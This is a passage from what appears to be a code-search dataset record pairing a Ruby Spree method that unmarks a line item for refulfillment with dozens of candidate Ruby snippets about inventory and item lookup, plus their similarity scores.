"def update_price\n req = Vacuum.new \n req.configure(\n aws_access_key_id: ENV['ACCESS_KEY_ID'],\n aws_secret_access_key: ENV['SECRET_KEY'],\n associate_tag: ENV['ASSOCIATES_ID']\n )\n\n req.associate_tag = 'shop1410f-20'\n\n sleep(1.seconds)\n\n item_id = self.item_id\n\n params = {\n 'IdType' => 'ASIN',\n 'ItemId' => item_id,\n 'ResponseGroup' => 'Offers, Images'\n }\n \n #For Product Price \n res = req.item_lookup(params)\n\n hash = res.to_h\n self.price = hash[\"ItemLookupResponse\"][\"Items\"][\"Item\"][\"Offers\"][\"Offer\"][\"OfferListing\"][\"Price\"][\"FormattedPrice\"]\n self.save\n end",
"def find_item_by_name_in_collection(name, collection)\n collection.each{|items|\n if items[:item] === name\n return items \n end}\n nil\nend",
"def examine(item)\r\n \r\n end",
"def get_item name\n if (@listOfItem)\n @listOfItem.select do |item|\n item.product.name == name\n end.first\n else\n puts \"@listOfItem is null, so can't get an item from this\"\n end\n end",
"def find_pet_by_name(pet_shop, pet_name)\n for pet in pet_shop[:pets]\n return pet if pet[:name] == pet_name\n end\n return nil\nend",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == pet\n return pet\n else return nil\n end\nend\nend",
"def find_pet_by_name(pet_shop, pet_name)\n for pet in pet_shop[:pets]\n if pet[:name] == pet_name\n return pet\n end\n end\n return nil\nend",
"def find_pet_by_name(pet_shop, pet_name)\n for pet in pet_shop[:pets]\n if pet[:name] == pet_name\n return pet\n end\n end\n return nil\nend",
"def searched_items\n # search by city_section if that param is passed in (convert city_section string name to key for db lookup first)\n #if params[:city_section]\n # @the_things = DonorPickup.city_section_is(params[:city_section]).paginate(default_pagination_params)\n # return\n #end\n \n \n @the_things = DonorPickup.first_name_like(params[:search_first_name]).\n last_name_like(params[:search_last_name]).\n address_like(params[:search_address]).\n with_state(params[:search_state]).\n with_priority(params[:search_priority]).\n is_pending(params[:search_pending]).\n city_section_is(params[:search_city_section]).\n for_pickup_date_range(params[:search_pickup_time_lowest], params[:search_pickup_time_highest]).\n select{ |dp| params[:search_item_id].blank? ? true : dp.has_this_item?(params[:search_item_id].to_i)}.\n paginate(default_pagination_params)\n \n end",
"def get_matching_item(request)\r\n matching_items= self.overlay.active_items_by_name_and_user(request.name, self)\r\n matching_items[0]\r\n end",
"def find_pet_by_name(pet_shop, pet_name)\n\n for found_pet in pet_shop[:pets]\n if found_pet[:name] == pet_name\n #puts \"I found #{found_pet[:name]}.\"\n return found_pet\n end\n end\n return nil\n # if this is in the loop, it kills the process after only\n # checking the first one.\nend",
"def find_pet_by_name(pet_shop, name)\n pets = pets\n for pet in pet_shop[:pets]\n if pet[:name] == name\n pets = pet\n nil\n end\n end\n return pets\nend",
"def test_physicalAttackItem\n f = ItemFilter.new(\"physical_attack\", true)\n new_list = @usableItems.find_all{|x| f.apply(x)}\n return new_list.size == 2\n end",
"def get_item_availability(holding, item)\n # is_offsite = LOCATIONS['offsite_locations'].include? holding[:location_code]\n # if is_offsite\n if is_offsite_location_code?(holding[:location_code])\n self.fetch_scsb_availabilty unless @scsb_availability\n return @scsb_availability[ item[:barcode] ] if @scsb_availability.has_key?(item[:barcode])\n else\n # If we didn't find an offsite availability for this item, check Voyager availability\n self.fetch_voyager_availability unless @voyager_availability\n return @voyager_availability[ item[:item_id] ]\n end \n end",
"def find_item_by_name_in_collection(name, collection)\n counter = 0\n while counter < collection.length #which it is 3\n #collection[counter] #collection[0] then collection[1] then collection [2] then collection[3] which will end the loop\n #now we are looking for this specific item in our collection. \n if collection[counter][:item] == name\n return collection[counter]\n end\n counter += 1\n end\n #nil -to ensure nil is return if item is not in the collection\nend",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n return nil\nend",
"def find_item(name)\n items.find do |item|\n item.name == name ||\n item.short_name.gsub('…','') == name.gsub('…','')\n end\n end",
"def item_from_uuid(id)\n @items.find { |i| i[:id].to_s == id } || raise(\"Unable to resolve item for uuid '#{id}'\")\n end",
"def fetch_inventory\n @offer[:records] ||= Item.where(survivor_id: @offer[:survivor_id]).to_a\n @for[:records] ||= Item.where(survivor_id: @for[:survivor_id]).to_a\n end",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n return nil\nend",
"def fetch_item(item_selector, opts)\n query = item_selector.merge({:state => opts[:from]})\n physical_item = @inventory.find_and_modify(:query => query,\n :update => {'$set' => {:state => opts[:to], :add_time => Time.now}})\n\n physical_item['_id']\n end",
"def use_item_by_string(name, e)\n index = has_item_by_string(name)\n if (index != -1)\n inventory[index].first.use(e)\n else\n print \"What?! You don't have THAT!\\n\\n\"\n end\n end",
"def fetch(id)\n # Pass in a proc that will return true if item with id is looked up\n # (pass in invItem as a param to lambda)\n return lookup(id, Proc.new { |invItem| return invItem } )\n end",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n\n return nil\nend",
"def find_pet_by_name(shop, pet_name)\n for pet in shop[:pets]\n if pet[:name] == pet_name\n return pet\n end\n end\n return nil\nend",
"def has_item_by_string(name)\n inventory.each_with_index do |couple, index|\n if (name.casecmp(couple.first.name) == 0)\n return index\n end\n end\n return -1\n end",
"def test_locate_item\n result = locate_item(@warehouse, :b5)\n assert_equal(\"nail filer\" , result)\nend",
"def inventory_item_is_available\n \tif self.inventory_item.present? && self.inventory_item.is_available?(project.rental_delivery, project.rental_pickup) == false\n \t\terrors.add(:inventory_item, \"is not available within this project's duration\")\n \telsif self.inventory_item.blank?\n \t\tself.inventory_item = inventory_style.find_available(project.rental_delivery, project.rental_pickup)\n \t\terrors.add(:inventory_style, \"has no available items within this project's duration\") if self.inventory_item.blank?\n \tend\n end",
"def find_pet_by_name(shop, name)\n\n for pet in shop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n return nil\n\nend",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n return nil\nend",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n return nil\nend",
"def has_item_by_string(name)\n inventory.each_with_index do |couple, index|\n if (name.casecmp(couple.first.name) == 0)\n return index\n end\n end\n\n return -1\n end",
"def withInventory\n\t\t@inventoryItems = Item.where(:inventory > 0)\n\tend",
"def lookup_info(pname, workitem)\n\n return nil unless pname\n\n wi = workitem ?\n Ruote::Workitem.new(workitem.merge('participant_name' => pname)) :\n nil\n\n get_list['list'].each do |regex, pinfo|\n\n next unless pname.match(regex)\n\n return pinfo if workitem.nil?\n\n pa = instantiate(pinfo, :if_respond_to? => :accept?)\n\n return pinfo if pa.nil?\n return pinfo if Ruote.participant_send(pa, :accept?, 'workitem' => wi)\n end\n\n # nothing found...\n\n nil\n end",
"def line_item_items_exist_in_inventory\n self.line_items.each do |line_item|\n next unless line_item.item\n inventory_item = self.from.inventory_items.find_by(item: line_item.item)\n if inventory_item.nil?\n errors.add(:inventory,\n \"#{line_item.item.name} is not available \" \\\n \"at this storage location\")\n end\n end\n end",
"def find_pet_by_name(shop_hash, pet_name)\n for pet_hash in shop_hash[:pets]\n if pet_hash[:name] == pet_name\n return pet_hash\n end\n end\n # if no matches, we expect a program to return nil.\n return nil\nend",
"def find_on_sale(name)\n flyer_items.find do |i|\n i.match?(name) unless i.nil?\n end\n end",
"def find_items_like_mine\n if self.forsale\n return Item.where('ownership_id == ? AND lower(name) == ?', WANTED, self.name.downcase)\n elsif self.wanted\n return Item.where('ownership_id == ? AND lower(name) == ?', FORSALE, self.name.downcase)\n else\n return nil\n end\n end",
"def skillitem_process(ch, object)\n # determine whether skill or item for easier reference\n case object\n when RPG::Skill\n skill, d, time = true, Skills.range(object.id), Skills.trap(object.id)\n type, charge = Skills.type(object.id), Skills.charge(object.id)\n projectile_speed = Skills.projectile_speed(object.id)\n spriteset = BlizzABS::SPRProjSkill\n when RPG::Item\n skill, d, time = false, Items.range(object.id), Items.trap(object.id)\n type, charge = Items.type(object.id), Items.charge(object.id)\n projectile_speed = Items.projectile_speed(object.id)\n spriteset = BlizzABS::SPRProjItem\n end\n # fix the missing explosion animation error\n type[2] = 0 if type[1] != EXPLNone && type[2] == nil\n # if enemy\n if ch.is_a?(Map_Enemy) && charge[0] == CHARGETrigger\n # correct charge type\n charge[0] = CHARGEMove\n end\n # if not charging already and no selection data\n if charge[0] != CHARGENone && !ch.charging? &&\n $game_temp.select_data == nil\n # setup charging\n ch.setup_charge(object, charge)\n # not used yet\n return false\n end\n # if summoning\n if type[0] == SUMMON\n # nobody except actors can summon with caterpillar turned on\n return false unless ch.is_a?(Map_Actor) && $game_system.caterpillar\n # get summoning data\n summon = (skill ? Skills.summon(object.id) : Items.summon(object.id))\n # if summon ID or time is 0\n if summon[0] == SUMMONNone || summon[1] == 0 || summon[2] == 0\n # no summoning\n return false \n end\n # no summoning if already summoned\n return false if (@pets + @monsters).any? {|b| b.battler_id == summon[1]}\n # if any summon limit reached\n if summon[0] == SUMMONPet && @pets.size >= BlizzABS::Config::MAX_PETS ||\n summon[0] == SUMMONMonster &&\n @monsters.size >= BlizzABS::Config::MAX_MONSTERS ||\n @pets.size + @monsters.size >= BlizzABS::Config::MAX_SUMMONS\n # no summoning\n return false\n end\n # create new map actor\n new_battler = Map_Actor.new(summon[1])\n # if pet\n if summon[0] == SUMMONPet\n # summon pet\n summon_pet(new_battler, summon[2])\n # if monster\n elsif summon[0] == SUMMONMonster\n # summon monster\n summon_monster(new_battler, summon[2])\n else\n # something's not right here, no summoning\n return false\n end\n # get pixel movement rate\n pix = $BlizzABS.pixel\n # move to correct position\n new_battler.moveto(ch.x / pix, ch.y / pix)\n # set correct battler\n new_battler.battler = $game_actors[summon[1]]\n # heal the battler completely\n new_battler.battler.recover_all\n # return to caterpillar first\n new_battler.cindex, new_battler.ai.state = nil, AI::Return\n # refresh display\n new_battler.refresh\n # set animation\n new_battler.animation_id = object.animation2_id\n # summon successful\n return true\n end\n # skill/item used (can be a common event call) if no target scope\n return true if object.scope == 0\n # if targeting self\n if object.scope == 7\n # if skill\n if skill\n # execute skill upon user\n ch.skill_effect(ch, ch.battler, object)\n # check special skill effects\n self.check_special_skills(ch, [ch], object)\n else\n # execute item upon user\n ch.item_effect(ch, object)\n end\n # clear damage displays\n ch.battler.damage, ch.battler.damage_pop = nil, false\n # skill/item used\n return true\n end\n # correct range\n d = 1 if d < 1\n # determine target alignment, dead flag and all flag\n enemy, dead, all = $BlizzABS.util.get_scope_data(object.scope)\n # doesn't target all and no death roulette initially\n target_all = false\n # if Tons is there and skill process\n if $tons_version != nil && $tons_version >= 6.02 && skill\n # if version is correct and Target 'em all! is being used for this skill\n if $game_system.TARGET_EM_ALL && FULL_TARGET_IDS.include?(object.id)\n # targets all and forces all flag\n target_all = all = true\n end\n end\n # temporary variable\n ai = ch.ai\n # determine whether actor or enemy for easier reference\n if ch.is_a?(Map_Actor)\n # decide target group\n group = (((ch == $game_player || ch.restriction != 3) == enemy) ?\n ai.negative : ai.positive)\n else\n # determine target group depending on confusion\n group = (((ch.restriction == 3) == enemy) ? ai.positive : ai.negative)\n end\n # selection only if player using selectable skill/item and not charging\n if ch == $game_player && $game_temp.select_data == nil &&\n (charge[0] == CHARGENone || charge[0] != CHARGENone &&\n ch.charged?) && (target_all || type[0] == HOMING ||\n type[0] == DIRECT || type[0] == BEAM && all)\n # temporary variable, selection skill/item\n handling = 0\n else\n # set handling for projectile skill/item or direct skill/item\n handling = ((type[0] == SHOOT || type[0] == HOMING ||\n type[0] == TRAP || type[0] == TIMED) ? 1 : 2)\n end\n # depending on handling\n case handling\n when 0 # selection\n # create circle shape data\n area = $BlizzABS.util.get_circle_area(ch, d)\n # create fullscreen rectangle\n screen = $BlizzABS.util.get_fullscreen_area\n # no use if scene not Scene_Map or spriteset doesn't exist\n return false if !$scene.is_a?(Scene_Map) || $scene.spriteset == nil\n # get all selectable map battlers\n available = $scene.spriteset.character_sprites.find_all {|sprite|\n sprite.character.is_a?(Map_Battler) &&\n !sprite.character.is_a?(Map_Remote) &&\n group.include?(sprite.character.ai.group) &&\n can_be_hit(sprite.character, dead, type, all, screen, area)}\n # no use if no selectable targets\n return false if available.size == 0\n # sort selectable targets by coordinates\n available.sort {|a, b| b.y > a.y ? 1 : b.y < a.y ? -1 : (b.x <=> a.x)}\n # setup select interuption\n $game_temp.select_data = [object, d * 32, type[0], available]\n # don't use skill/item yet\n return false\n when 1 # projectile\n # decide process branch depending on skill type\n case type[0]\n # set normal or break-through projectile data\n when SHOOT\n # if break-through\n if all\n # set break-through projectile skill or item\n projectype = (skill ? REMBreakSkill : REMBreakSkill)\n else\n # set normal projectile skill or item\n projectype = (skill ? REMNormalSkill : REMNormalItem)\n end\n # set range\n targets = [d]\n # homing skill/item\n when HOMING\n # get circle area\n area = $BlizzABS.util.get_circle_area(ch, d)\n # create fullscreen rectangle\n screen = $BlizzABS.util.get_fullscreen_area\n # get all targets that can be hit\n targets = ($game_map.battlers + $BlizzABS.battlers).find_all {|b|\n can_be_hit(b, dead, type, all, screen, area)}\n # if targetting everybody\n if target_all\n # reflection possible on everybody\n other = targets.clone\n else\n # reflection possible on non-target group\n other = targets.find_all {|b| !group.include?(b.ai.group)}\n # if predefined target exists\n if !all && ai.target != nil\n # set predefined target\n targets = [ai.target]\n else\n # set possible targets\n targets = targets.find_all {|b| group.include?(b.ai.group)}\n end\n end\n # set homing projectile type\n projectype = (skill ? REMInitSkill : REMInitItem)\n # homing skill/item\n when TRAP\n # targets for selection, other targets\n targets, other = [], []\n # set homing projectile type\n projectype = (skill ? REMTrapSkill : REMTrapItem)\n # homing skill/item\n when TIMED\n # targets for selection, other targets\n targets, other = [], []\n # set homing projectile type\n projectype = (skill ? REMTimedSkill : REMTimedItem)\n end\n when 2 # direct\n # if direct skill or shockwave skill\n if type[0] == DIRECT\n # get circle area\n area = $BlizzABS.util.get_circle_area(ch, d)\n # if beam skill (fullscreen skill that does not target all)\n elsif !all\n # get affection area rectangle\n area = $BlizzABS.util.get_front_area(ch, d)\n # initialize\n this = nil\n # if scene is Scene_Map and spriteset exists\n if $scene.is_a?(Scene_Map) && $scene.spriteset != nil\n # find the sprite of this character\n $scene.spriteset.character_sprites.each {|spr|\n if spr.character == ch\n this = spr\n break\n end}\n end\n # if sprite exists\n if this != nil\n # create sprite\n sprite = Sprite.new($scene.spriteset.viewport1)\n # try to\n begin\n # load the characterset file\n sprite.bitmap = RPG::Cache.character(object.icon_name, 0)\n # temporary variables\n w1, h = sprite.bitmap.width, sprite.bitmap.height\n # if failed\n rescue\n # get width and height\n w1, h = 24, d*32\n # create bitmap\n sprite.bitmap = Bitmap.new(w1, h)\n # get image from cache\n b = $BlizzABS.cache.image('beam1')\n # copy the beam image\n (0...h).each {|i|\n a = (i < h/2 ? i**2*2 : (h-i-1)**2*2)\n a = 255 if a > 255\n sprite.bitmap.blt(0, i, b, Rect.new(0, 0, b.width, b.height), a)}\n end\n w2 = case ch.direction\n when 6 then 16-w1/2\n else\n w1/2+16\n end\n # set sprite position, rotation and offsets depending on facing\n case ch.direction\n when 2\n sprite.angle, sprite.ox = 0, w1/2\n sprite.x, sprite.y, sprite.z = this.x, this.y, this.z+1\n when 4\n sprite.angle, sprite.ox, sprite.oy = 270, w2, w1/2+16\n sprite.x, sprite.y, sprite.z = this.x-w1-16, this.y, this.z-1\n when 6\n sprite.angle, sprite.ox, sprite.oy = 90, -w2, -w1/2+16\n sprite.x, sprite.y, sprite.z = this.x+16, this.y, this.z-1\n when 8\n sprite.angle, sprite.ox, sprite.oy = 180, w1/2, h+16\n sprite.x, sprite.y, sprite.z = this.x, this.y-h-32, this.z-32\n end\n # add sprite for handling\n $BlizzABS.cache.beams.push([sprite, 20])\n # set beam flag\n beam = true\n end\n end\n # create fullscreen rectangle\n screen = $BlizzABS.util.get_fullscreen_area\n # get all targets that can be hit\n targets = ($game_map.battlers + $BlizzABS.battlers).find_all {|b|\n can_be_hit(b, dead, type, all, screen, area)}\n # if targetting everybody\n if target_all\n # reflection possible on everybody\n other = targets.clone\n else\n # reflection possible on non-target group\n other = targets.find_all {|b| !group.include?(b.ai.group)}\n # if predefined target exists\n if !all && ai.target != nil\n # set predefined target\n targets = [ai.target]\n else\n # set possible targets\n targets = targets.find_all {|b| group.include?(b.ai.group)}\n end\n end\n end\n # if no selectable targets and not trap\n if targets.size == 0 && projectype != REMTrapSkill &&\n projectype != REMTrapItem && projectype != REMTimedSkill &&\n projectype != REMTimedItem\n # no use\n return (beam == true)\n end\n # if Full Reflection System is being used and not breaking reflection skill\n if $full_reflection_system != nil && $full_reflection_system >= 3.01 &&\n targets[0].is_a?(Map_Battler) && skill && !beam &&\n !BlizzCFG::BREAK_REFLECT.include?(object.id) &&\n projectype != REMTrapSkill && projectype != REMTrapItem &&\n projectype != REMTimedSkill && projectype != REMTimedItem\n # execute reflection effect in Blizz-ABS\n BlizzCFG.reflection_effect_blizzabs(ch, targets, other, object)\n end\n # get a random target if not targeting all and no beam or death roulette\n targets = [targets[rand(targets.size)]] if !all && !beam\n # if projectile data is available and projectile should be created\n if projectype != nil\n # temporary variable\n explode = (type[1] != EXPLNone ? type[1, 3] : nil)\n # if trap\n if projectype == REMTrapSkill || projectype == REMTrapItem\n # create trap\n proj = Map_Trap.new(spriteset + object.id.to_s, ch, object.id, d,\n time, projectype, group, dead, explode)\n # add trap to buffer\n $BlizzABS.cache.remotes.push(proj)\n # if timed trap\n elsif projectype == REMTimedSkill || projectype == REMTimedItem\n # create timed trap\n proj = Map_Timed.new(spriteset + object.id.to_s, ch, object.id, d,\n time, projectype, group, dead, explode)\n # add timed trap to buffer\n $BlizzABS.cache.remotes.push(proj)\n else\n # iterate through all targets\n targets.each {|target|\n # create projectile\n proj = Map_Projectile.new(spriteset + object.id.to_s, ch,\n object.id, target, projectile_speed, projectype, group, dead,\n explode)\n # add projectile to buffer\n $BlizzABS.cache.remotes.push(proj)}\n end\n # if skill\n elsif skill\n # execute skill effect upon all targets\n targets.each {|target| target.skill_effect(ch, ch.battler, object)}\n # check special skill effects\n self.check_special_skills(ch, targets, object)\n # clear damage displays upon all targets\n targets.each {|target|\n target.battler.damage, target.battler.damage_pop = nil, false}\n else\n # upon all targets\n targets.each {|target|\n # execute item effect\n target.item_effect(ch, object)\n # clear damage displays\n target.battler.damage, target.battler.damage_pop = nil, false}\n end\n # skill/item use successful\n return true\n end",
"def get_product( row )\n puts \"get product row:\" + row.join(\"--\")\n pro = Variant.find_by_sku( at_in(:sku , row ) )\n if pro\n puts \"Found #{at_in(:sku,row)} \"\n pro.product \n else\n p = Product.create( :name => \"sku\" , :price => 5 , :sku => \"sku\")\n p.save!\n master = Variant.find_by_sku(\"sku\")\n master.product = Product.find_by_name(\"sku\")\n master.save\n Product.find_by_name(\"sku\")\n end\n end",
"def find_item(reference)\n\t\t@items.detect{|i| i.reference == reference}\n\tend",
"def find_or_build_spill_over_virtual_purchase\n spill_over_account = expected_purchase.recipe.spill_over_virtual_account\n \n virtual_purchases.select{ |vp| vp.account_from == spill_over_account }.first ||\n virtual_purchases.build(:account_from => spill_over_account, :amount => 0)\n end",
"def find_pet_by_name(pet_shop, pet_name)\n\n for pets in pet_shop[:pets]\n\n if pets[:name] == pet_name\n\n\n return pets\n\n end\n end\n\n return\n end",
"def store_or_lookup(item)\n if asin = amazon_asin(item)\n returning AmazonItem.find_or_create_by_asin(asin) do |amazon_item|\n amazon_item.update_from_amazon(item)\n end\n end\n end",
"def available_inventory\n return self.inventory\n end",
"def check(props)\n @results = nil\n name = props.item.title[/Establish (.*)/, 1]\n\n # if full title contains a name in parenthesis, check for that name too\n altname = props.item.fulltitle[/\\((.*?)\\)/, 1]\n\n if name and Server.podlingnamesearch\n for podling in Server.podlingnamesearch\n if name == podling\n @results = Server.podlingnamesearch[name]\n elsif altname == podling\n @results = Server.podlingnamesearch[altname]\n end\n end\n end\n\n Vue.forceUpdate()\n end",
"def include?(item)\r\r\n item[:discovered]\r\r\n end",
"def find_items_like_mine\n\t\tif self.forsale\n\t\t\treturn Item.where('ownership_id == ? AND lower(name) == ?', WANTED, self.name.downcase) \n\t\telsif self.wanted \n\t\t\treturn Item.where('ownership_id == ? AND lower(name) == ?', FORSALE, self.name.downcase)\n\t else \n\t \t\treturn nil \t \n\t end \n\tend",
"def get_from_tags(resource, item)\n (resource['tags'] || []).detect { |tag, _| tag['key'].downcase == item.to_s.downcase }.try(:[], 'value')\n end",
"def use_item_by_string(name, e)\n index = has_item_by_string(name)\n if (index != -1)\n actual_item = inventory[index].first\n actual_item.use(e)\n remove_item(actual_item) if actual_item.consumable\n else\n print \"What?! You don't have THAT!\\n\\n\"\n end\n end",
"def find_item_type\n if params[:item_type].in? ['contact', 'organization', 'project', 'event']\n @item_type = params[:item_type]\n end\n end",
"def find_item_type\n if params[:item_type].in? ['contact', 'organization', 'project', 'event']\n @item_type = params[:item_type]\n end\n end",
"def get_item_from_sellable_state(inventory_item_params)\n initial_condition = inventory_item_params[:inventory_item_condition_id]\n inventory_item_in_sellable_state = get_item_in_this_state(inventory_item_params, \"Available\")\n if inventory_item_in_sellable_state.nil?\n inventory_item_in_sellable_state = get_item_in_this_state(inventory_item_params, \"Critical_Level\")\n end\n if inventory_item_in_sellable_state.nil?\n inventory_item_params[:inventory_item_condition_id] = InventoryItemCondition.find_by(name: \"Not_Sellable\" ).id\n inventory_item_in_sellable_state = get_item_in_this_state(inventory_item_params, \"Out_of_Stock\")\n inventory_item_params[:inventory_item_condition_id] = initial_condition\n end\n return inventory_item_in_sellable_state\n end",
"def food_trucks_that_sell(desired_item)\n food_truck_list = []\n @food_trucks.each do |food_truck|\n food_truck.inventory.each do |item|\n if item.first.name == desired_item.name\n food_truck_list << food_truck\n end\n end\n end\n food_truck_list\n end",
"def find_item(item)\n md5 = ItemBuilder.md5(item)\n items.find { |e| e[0] == md5 } if items\n end",
"def inventorycheck(args)\n #find inventory item by id\n Inventory.find(args) do |item|\n arr = []\n #capture stock item qty into variable\n stock = item.qty\n #loop into each item and check the existing appointments per item\n item.clinic.surgery_appts.each do |recipe|\n #check the surgery recipe requirements per appointment\n #check ONLY the items that pertain the the supply list item that was declared above\n recipe.surgery_type.surgery_recipe_reqs.where(supply_list_id:args).each do |req|\n #store those recipe requirements into the array\n arr << req.qty\n end\n end\n #sum all the items in the array together\n arr = arr.sum\n p arr\n #subract the appointment totals from the Inventory stock qty\n stock = stock - arr\n #update the Inventory stock qty\n Inventory.find(args).update(qty:stock)\n end\nend",
"def find_pet_by_name(shop,name)\n pet_name = nil ##sets pet_name to nil to ensure nil is returned if pet name is not found. (Ruby will return nil anyway if not found, but good practice to ensure it's correct)\n for pet in shop[:pets]\n if pet[:name] == name\n pet_name = pet\n end\n end\n return pet_name\nend",
"def available\n @available ||= product.available(inventory, lot_code)\n end",
"def find_item(variant, state = :on_hand, line_item = nil)\n contents.select do |item|\n item.variant == variant &&\n item.state == state &&\n (line_item.nil? || line_item == item.line_item)\n end.first\n end",
"def find(selector, opts={})\n itemFields = %{\n id\n updated\n title\n published\n abstract\n authors { nodes { name } }\n contributors { nodes { name } }\n subjects\n keywords\n language\n type\n contentType\n rights\n journal\n volume\n issue\n fpage\n lpage\n issn\n }\n\n # Individual item (e.g. GetRecord)\n if selector != :all\n selector.sub!(\"ark:/13030/\", \"\")\n selector =~ /^qt\\w{8}$/ or raise(OAI::IdException.new)\n record = apiQuery(%{\n item(id: \"ark:/13030/#{selector}\") { #{itemFields} }\n }).dig(\"item\")\n record or raise(OAI::NoMatchException.new)\n return EscholRecord.new(record)\n end\n\n # If there's a resumption token, decode it, and grab the metadata prefix\n resump = nil\n if opts[:resumption_token]\n resump = EscholResumptionToken.decode(opts[:resumption_token])\n opts[:metadata_prefix] = resump.opts[:metadata_prefix]\n opts[:set] = resump.opts[:set]\n opts.delete(:resumption_token)\n end\n\n # Check for setSpec\n queryParams = {}\n tags = []\n unitSet = nil\n if opts[:set] && opts[:set] != \"everything\"\n setStr = opts[:set].sub(/^col_/, '') # handle dspace-style \"col_\" to front of set names\n if $disciplines.include?(setStr)\n queryParams[:discTag] = [\"String!\", \"discipline:#{setStr}\"]\n tags << \"$discTag\"\n elsif apiQuery(\"unit(id: $unitID) { name }\", { unitID: [\"ID!\", setStr] }).dig(\"unit\", \"name\")\n unitSet = setStr\n elsif %w{ARTICLE CHAPTER ETD MONOGRAPH MULTIMEDIA NON_TEXTUAL}.include?(setStr)\n queryParams[:typeTag] = [\"String!\", \"type:#{setStr}\"]\n tags << \"$typeTag\"\n else\n raise(OAI::NoMatchException.new)\n end\n end\n\n # For incremental harvest, make sure we include at least 24 hours of data. This is because with\n # the Ruby OAI library it's hard for us to differentiate the actual granularity of the client\n # request, because we receive a Time here.\n fromTime = !resump && opts[:from] && opts[:from].iso8601 != @earliest ? opts[:from] : nil\n untilTime = !resump && opts[:until] && opts[:until].iso8601 != @latest ? opts[:until] : nil\n if fromTime && untilTime && untilTime < (fromTime + 24*60*60)\n untilTime = fromTime + 24*60*60\n end\n\n # Now form a GraphQL query to capture the data we want.\n # A note on the time parameters below: the OAI library we're using fills in :from and :until\n # even if they weren't specified in the URL; for efficience we filter them out in that case.\n resump and queryParams[:more] = [\"String\", resump.more]\n itemQuery = %{\n items(\n order: UPDATED_DESC\n first: 500\n include: [#{Thread.current[:privileged] ? \"EMBARGOED,WITHDRAWN,EMPTY,PUBLISHED\" : \"PUBLISHED,EMBARGOED\"}]\n #{resump ? \"\\nmore: $more\" : ''}\n #{fromTime ? \"\\nafter: \\\"#{(fromTime-1).iso8601}\\\"\" : ''}\n #{untilTime ? \"\\nbefore: \\\"#{untilTime.iso8601}\\\"\" : ''}\n #{!tags.empty? ? \"\\ntags: [#{tags.join(\",\")}]\" : ''}\n ) {\n #{resump ? '' : 'total'}\n more\n nodes { #{itemFields} }\n }\n }\n\n # Add unit query if a unit set was specified\n outerQuery = itemQuery\n if unitSet\n queryParams[:unitID] = [\"ID!\", unitSet]\n outerQuery = \"unit(id: $unitID) { #{itemQuery} }\"\n end\n\n # Run it and drill down to the list of items\n data = apiQuery(outerQuery, queryParams)\n unitSet and data = data['unit']\n data = data['items']\n\n # Map the results to OAI records\n records = data['nodes'].map { |record|\n EscholRecord.new(record)\n }\n\n # And add a resumption token if there are more records.\n if data['more']\n OAI::Provider::PartialResult.new(records, EscholResumptionToken.new(opts,\n (resump && resump.count) || 0, # current count\n ((resump && resump.count) || 0) + data['nodes'].length, # next count\n data['total'] || (resump && resump.total), # total\n data['more']))\n else\n records\n end\n end",
"def has_item_by_object(item)\n inventory.each_with_index do |couple, index|\n if (couple.first == item)\n return index\n end\n end\n return -1\n end",
"def has_item_by_object(item)\n inventory.each_with_index do |couple, index|\n if (couple.first == item)\n return index\n end\n end\n return -1\n end",
"def find_pet_by_name(petshop,pet_name)\n petshop[:pets].each do \n if pet_hash[:name] == pet_name\n return pet_hash\n end\n end\n return nil\n end",
"def strict_matching(ingredient_name,item)\n return item.downcase.include?(ingredient_name)\nend",
"def refine_item_outlook(item)\n the_item = {}\n if Status.find(item.status_id).value.include? \"Banned\"\n the_item = {id: item.id, title: item.title, description: item.description, category: Category.find(item.category_id).value, \n price: \"%.2f\" % item.price, seller_longitude: Seller.find(item.seller_id).longitude,\n seller_latitude: Seller.find(item.seller_id).latitude, status: Status.find(item.status_id).value}\n else \n the_item = {id: item.id, title: item.title, description: item.description, category: Category.find(item.category_id).value, \n price: \"%.2f\" % item.price, seller_name: Seller.find(item.seller_id).name, seller_longitude: Seller.find(item.seller_id).longitude,\n seller_latitude: Seller.find(item.seller_id).latitude, status: Status.find(item.status_id).value, published_date: item.published_date}\n end\n return the_item\n end"
] | [
"0.5888857",
"0.5794193",
"0.57222027",
"0.55928975",
"0.55855024",
"0.5517034",
"0.5466443",
"0.5454543",
"0.54469365",
"0.5445379",
"0.54404634",
"0.5355519",
"0.5347431",
"0.534116",
"0.53241557",
"0.52610016",
"0.52512985",
"0.5249569",
"0.5247355",
"0.52398074",
"0.5233867",
"0.5195433",
"0.5194405",
"0.5180294",
"0.5176287",
"0.51709247",
"0.5167681",
"0.5166536",
"0.51460266",
"0.51417696",
"0.5119549",
"0.5109891",
"0.5100992",
"0.50939214",
"0.50922513",
"0.509121",
"0.50857097",
"0.5083151",
"0.5079385",
"0.50632536",
"0.5056973",
"0.5034459",
"0.5034459",
"0.50299865",
"0.50297076",
"0.5028186",
"0.5027168",
"0.50195843",
"0.50181097",
"0.50086343",
"0.5008043",
"0.5007635",
"0.50057274",
"0.49977845",
"0.49975497",
"0.4997292",
"0.4992181",
"0.49838042",
"0.4981088",
"0.49794585",
"0.49726778",
"0.49686134",
"0.49656758",
"0.4965639",
"0.49627644",
"0.49627644",
"0.49611402",
"0.49486405",
"0.49473178",
"0.49465138",
"0.4943728",
"0.49434328",
"0.49387828",
"0.4937059",
"0.4928514",
"0.4925883",
"0.49209556",
"0.49041352",
"0.4899629",
"0.4895222",
"0.4890031",
"0.48890477",
"0.4886184",
"0.488356",
"0.48731408",
"0.48725018",
"0.48725018",
"0.48714542",
"0.48703852",
"0.48684505",
"0.48684213",
"0.4868186",
"0.48626012",
"0.48566884",
"0.4852241",
"0.4851846",
"0.4851846",
"0.4849559",
"0.48456007",
"0.48398837"
] | 0.56648356 | 3 |
unmark a lineitem for refulfillment, chose not to increment the inventory count due possibility that inventory was refreshed, better to err on side of less inventory | def unrefulfill_line_item(line_item_id)
li = Spree::LineItem.find(line_item_id)
li.refulfill = nil
li.save
end | {
"objective": {
